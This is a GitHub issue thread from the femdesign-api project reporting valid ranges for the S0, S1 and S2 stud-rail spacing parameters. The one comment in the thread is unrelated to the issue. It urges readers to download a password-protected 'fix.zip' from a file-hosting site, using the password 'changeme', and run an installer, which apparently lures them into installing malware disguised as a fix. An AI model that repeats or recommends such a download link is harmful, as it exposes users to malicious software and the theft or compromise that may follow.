### ISSUE TITLE
S0, S1, S2 in `FemDesign.Reinforcement.PunchingReinforcement.StudRails` cannot be null

### ISSUE THREAD

**Issue by lorinczandrea** [strusoft/femdesign-api#1077]
These parameters must be within the following ranges:
0.02 <= s0 <= 10 
0.03 <= s1,s2 <= 10
(s0, s1, s2 values are in metres in the API)

Opening .struxml in FD will fail if the parameter values are out of range.

FEM-Design GUI:
![image](https://github.com/user-attachments/assets/06c16e8c-dc55-43a3-9f02-f0bba359a3e3)

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
